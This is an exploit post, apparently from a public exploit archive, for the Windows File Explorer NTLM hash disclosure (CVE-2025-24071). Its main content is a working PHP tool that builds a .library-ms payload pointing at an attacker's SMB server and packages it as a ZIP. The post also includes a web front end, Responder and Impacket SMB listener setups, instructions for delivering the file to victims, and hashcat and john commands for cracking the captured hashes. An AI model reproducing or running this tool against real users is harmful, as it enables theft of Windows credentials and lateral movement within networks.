The Windows File Explorer NTLM Hash Disclosure is a vulnerability The Windows File Explorer NTLM Hash Disclosure is a vulnerability where File Explorer inadvertently sends a user's NTLM hash to an attacker-controlled server.

This occurs when a user views or previews a specially crafted file (e.g., `.LNK`, `.SCF`, `.URL`) containing a UNC path like `\\malicious-server\share`.

File Explorer, in an attempt to generate a thumbnail or retrieve file information, tries to connect to this remote path. During this connection, it performs NTLM authentication using the logged-in user's credentials.

An attacker running a tool like Responder can intercept this NTLM challenge-response. With the captured NTLM hash, the attacker can perform "Pass-the-Hash" attacks for lateral movement or attempt to crack the hash offline to obtain the user's plaintext password. It's a common initial access or lateral movement technique.

=============================================================================================================================================
| # Title : Windows File Explorer NTLM v2 Hash Disclosure
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64
bits) |
| # Vendor : System built?in component.No standalone download available
|
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/197740/ &
CVE-2025-24071

[+] Summary :
Windows File Explorer in Windows 10 and 11 contains a critical
NTLM hash disclosure vulnerability that allows attackers to capture user
authentication
credentials by exploiting the automatic parsing of .library-ms files from
ZIP archives, leading to potential domain compromise through credential
relay attacks.
The vulnerability exists in Windows Explorer's automatic handling of
.library-ms files extracted from ZIP archives. When a user extracts a
malicious ZIP file,
Explorer automatically attempts to connect to SMB shares specified in the
.library-ms file, leaking NTLMv2 hashes to attacker-controlled servers
without user interaction.


[+] POC :

php poc.php

<?php

class WindowsNTLMHashDisclosure {

private $ip;
private $filename;
private $output_dir;
private $keep_files;

public function __construct($ip, $filename = 'malicious', $output_dir =
'output', $keep_files = false) {
$this->ip = $ip;
$this->filename = $filename;
$this->output_dir = rtrim($output_dir, '/');
$this->keep_files = $keep_files;
}

public function banner() {
echo "==================================================\n";
echo " Windows File Explorer NTLM Hash Disclosure\n";
echo " CVE-2025-24071 Exploit Tool\n";
echo " Author: indoushka (PHP Port)\n";
echo "==================================================\n\n";
}

public function create_library_ms() {
$payload = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library
">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{$this->ip}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
XML;

$library_file = $this->output_dir . '/' . $this->filename .
'.library-ms';

if (!file_put_contents($library_file, $payload)) {
throw new Exception("Failed to create .library-ms file");
}

echo "[+] Created malicious .library-ms file: {$library_file}\n";
return $library_file;
}

public function build_zip($library_file) {
$zip_file = $this->output_dir . '/' . $this->filename . '.zip';

$zip = new ZipArchive();
if ($zip->open($zip_file, ZipArchive::CREATE |
ZipArchive::OVERWRITE) !== TRUE) {
throw new Exception("Cannot create ZIP file: {$zip_file}");
}

$zip->addFile($library_file, basename($library_file));
$zip->close();

echo "[+] Created ZIP archive: {$zip_file}\n";
return $zip_file;
}

public function exploit() {
$this->banner();

echo "[*] Target SMB Server: {$this->ip}\n";
echo "[*] Output Directory: {$this->output_dir}\n";
echo "[*] Base Filename: {$this->filename}\n\n";

// Create output directory
if (!is_dir($this->output_dir)) {
if (!mkdir($this->output_dir, 0755, true)) {
throw new Exception("Failed to create output directory:
{$this->output_dir}");
}
}

// Create malicious .library-ms file
$library_file = $this->create_library_ms();

// Package into ZIP
$zip_file = $this->build_zip($library_file);

// Clean up if not keeping files
if (!$this->keep_files && file_exists($library_file)) {
unlink($library_file);
echo "[-] Removed intermediate .library-ms file\n";
}

$this->display_instructions($zip_file);

return $zip_file;
}

private function display_instructions($zip_file) {
echo "\n" . str_repeat("=", 60) . "\n";
echo " EXPLOITATION INSTRUCTIONS\n";
echo str_repeat("=", 60) . "\n";
echo "1. Start SMB listener on {$this->ip}:\n";
echo " - Using Responder: responder -I eth0 -wrf\n";
echo " - Using Impacket: smbserver.py SHARE /tmp/smb
-smb2support\n";
echo "\n2. Deliver ZIP file to victim:\n";
echo " - File: {$zip_file}\n";
echo " - Methods: Email, USB, Network share, etc.\n";
echo "\n3. When victim extracts ZIP, Windows Explorer will:\n";
echo " - Automatically parse .library-ms file\n";
echo " - Attempt SMB connection to {$this->ip}\n";
echo " - Leak NTLMv2 hash to your SMB server\n";
echo "\n4. Crack the captured hash:\n";
echo " - Use hashcat: hashcat -m 5600 hash.txt wordlist.txt\n";
echo " - Use john: john --format=netntlmv2 hash.txt\n";
echo str_repeat("=", 60) . "\n";
}

public static function is_valid_ip($ip) {
return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}

public function get_file_paths() {
return [
'library_ms' => $this->output_dir . '/' . $this->filename .
'.library-ms',
'zip' => $this->output_dir . '/' . $this->filename . '.zip'
];
}
}

class SMBListenerHelper {

public static function generate_responder_config($ip) {
$config = <<<CONFIG
; Responder Configuration for CVE-2025-24071
; Save as responder.conf

[Responder Core]
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On

; Network interface
Interface = eth0

; Specific IP to listen on
BindIP = {$ip}

; Analysis mode (optional)
Analyze = On
CONFIG;

return $config;
}

public static function generate_smbserver_script() {
$script = <<<PYTHON
#!/usr/bin/env python3
# Impacket SMB Server for CVE-2025-24071

from impacket import smbserver
from impacket.ntlm import compute_lmhash, compute_nthash
import argparse
import threading
import sys

class CVE202524071Server:
def __init__(self, listen_address, share_path):
self.server = smbserver.SimpleSMBServer(listen_address,
listen_address, 445)
self.server.addShare("SHARE", share_path)

def start(self):
print("[*] Starting SMB server for CVE-2025-24071")
print("[*] Waiting for NTLM hash leakage...")
self.server.start()

if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", required=True, help="IP to listen on")
parser.add_argument("--share", default="/tmp/smb", help="Share path")
args = parser.parse_args()

server = CVE202524071Server(args.ip, args.share)
server.start()
PYTHON;

return $script;
}
}

class HashCrackingHelper {

public static function display_cracking_commands($hash_file =
'captured_hashes.txt') {
$commands = [
'hashcat' => "hashcat -m 5600 {$hash_file}
/usr/share/wordlists/rockyou.txt",
'john' => "john --format=netntlmv2 {$hash_file}",
'online_crack' => "Use online services like crackstation.net or
hashes.com"
];

echo "\n" . str_repeat("=", 50) . "\n";
echo " HASH CRACKING COMMANDS\n";
echo str_repeat("=", 50) . "\n";

foreach ($commands as $tool => $command) {
echo "{$tool}: {$command}\n";
}
echo str_repeat("=", 50) . "\n";
}

public static function generate_hash_example() {
$example = <<<HASH
Example NTLMv2 Hash Format:
username::domain:challenge:HMAC-MD5:blob

Actual captured hash will look like:
Administrator::WIN11:1122334455667788:8846F7EAEE8FB117AD06BDD830B7586C:01010000000000000090D336F74CD801B8B5E9545C96D79F000000000200080053004D004200330001001E00570049004E002D0034004300520038004100330056004A0037004B00420004003400570049004E002D0034004300520038004100330056004A0037004B0042002E0053004D00420033002E004C004F00430041004C000300140053004D00420033002E004C004F00430041004C000500140053004D00420033002E004C004F00430041004C00070008000090D336F74CD8010600040002000000080030003000000000000000010000000020000006DE67E84DC5A62919F4D6F6A8F6F6D6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D0A001000000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E003100300030000000000000000000
HASH;

return $example;
}
}

// Command line interface
if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) ===
basename(__FILE__)) {

if ($argc < 2) {
echo "Windows File Explorer NTLM Hash Disclosure
(CVE-2025-24071)\n";
echo
"===========================================================\n";
echo "Usage: php " . $argv[0] . " <attacker_ip> [options]\n";
echo "Example: php " . $argv[0] . " 192.168.1.100\n";
echo "Example: php " . $argv[0] . " 192.168.1.100 -n payroll -o
./malicious_zips --keep\n";
echo "\nOptions:\n";
echo " -n, --name Base filename (default: malicious)\n";
echo " -o, --output Output directory (default: ./output)\n";
echo " -k, --keep Keep .library-ms file after ZIP creation\n";
echo " --smb-help Show SMB listener setup help\n";
echo " --crack-help Show hash cracking instructions\n";
exit(1);
}

$ip = $argv[1];
$filename = 'malicious';
$output_dir = 'output';
$keep_files = false;

// Parse command line options
for ($i = 2; $i < $argc; $i++) {
switch ($argv[$i]) {
case '-n':
case '--name':
$filename = $argv[++$i];
break;
case '-o':
case '--output':
$output_dir = $argv[++$i];
break;
case '-k':
case '--keep':
$keep_files = true;
break;
case '--smb-help':
echo
SMBListenerHelper::generate_responder_config('192.168.1.100');
echo "\n\n";
echo SMBListenerHelper::generate_smbserver_script();
exit(0);
case '--crack-help':
HashCrackingHelper::display_cracking_commands();
echo "\n" . HashCrackingHelper::generate_hash_example() .
"\n";
exit(0);
}
}

try {
if (!WindowsNTLMHashDisclosure::is_valid_ip($ip)) {
echo "[-] Invalid IP address: {$ip}\n";
exit(1);
}

$exploit = new WindowsNTLMHashDisclosure($ip, $filename,
$output_dir, $keep_files);
$zip_file = $exploit->exploit();

echo "\n[+] Exploit files created successfully!\n";
echo "[+] Deliver this file to the victim: {$zip_file}\n";

} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
exit(1);
}
}

// Web interface for the exploit
if (isset($_GET['web']) && $_GET['web'] === 'true') {
?>
<!DOCTYPE html>
<html>
<head>
<title>CVE-2025-24071 - NTLM Hash Disclosure</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px;
background: #f0f0f0; }
.container { max-width: 900px; margin: 0 auto; background:
white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px
rgba(0,0,0,0.1); }
h1 { color: #d32f2f; border-bottom: 2px solid #d32f2f;
padding-bottom: 10px; }
.form-group { margin: 20px 0; }
label { display: block; margin-bottom: 5px; font-weight: bold;
color: #333; }
input[type="text"] { padding: 10px; width: 300px; border: 1px
solid #ddd; border-radius: 4px; }
button { background: #d32f2f; color: white; padding: 12px 25px;
border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }
button:hover { background: #b71c1c; }
.output { background: #f8f8f8; padding: 15px; border-radius:
4px; margin: 20px 0; white-space: pre-wrap; font-family: monospace; }
.success { color: #388e3c; font-weight: bold; }
.error { color: #d32f2f; font-weight: bold; }
.info-box { background: #e3f2fd; padding: 15px; border-radius:
4px; margin: 15px 0; }
</style>
</head>
<body>
<div class="container">
<h1>CVE-2025-24071 - Windows NTLM Hash Disclosure</h1>

<?php
if ($_POST['generate'] ?? false) {
$ip = $_POST['ip'] ?? '';
$filename = $_POST['filename'] ?? 'malicious';
$keep_files = isset($_POST['keep_files']);

if (!empty($ip)) {
echo '<div class="output">';
try {
$exploit = new WindowsNTLMHashDisclosure($ip,
$filename, 'web_output', $keep_files);
$zip_file = $exploit->exploit();

$file_paths = $exploit->get_file_paths();
if (file_exists($file_paths['zip'])) {
$file_url = 'web_output/' .
basename($file_paths['zip']);
echo '<p class="success">ZIP file generated
successfully!</p>';
echo '<p><a href="' . $file_url . '"
download>Download Malicious ZIP File</a></p>';
}
} catch (Exception $e) {
echo '<p class="error">Error: ' . $e->getMessage()
. '</p>';
}
echo '</div>';
}
}
?>

<form method="post">
<div class="form-group">
<label for="ip">Your SMB Server IP:</label>
<input type="text" id="ip" name="ip"
placeholder="192.168.1.100" required>
</div>

<div class="form-group">
<label for="filename">ZIP Filename:</label>
<input type="text" id="filename" name="filename"
value="malicious">
</div>

<div class="form-group">
<label>
<input type="checkbox" name="keep_files" value="1">
Keep .library-ms file (for analysis)
</label>
</div>

<button type="submit" name="generate">Generate Malicious
ZIP</button>
</form>

<div class="info-box">
<h3>About CVE-2025-24071:</h3>
<p>This vulnerability affects Windows File Explorer in
Windows 10/11. When a user extracts a ZIP file containing a malicious
.library-ms file, Windows Explorer automatically attempts to connect to an
SMB server specified in the file, leaking the user's NTLMv2 hash.</p>

<h3>Exploitation Steps:</h3>
<ol>
<li>Set up SMB listener on your server</li>
<li>Generate malicious ZIP using this tool</li>
<li>Deliver ZIP to target user</li>
<li>Capture NTLM hash when they extract the file</li>
<li>Crack the hash to obtain credentials</li>
</ol>

<p><strong>Note:</strong> This tool is for educational and
authorized testing purposes only.</p>
</div>
</div>
</body>
</html>
<?php
exit;
}

?>



Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================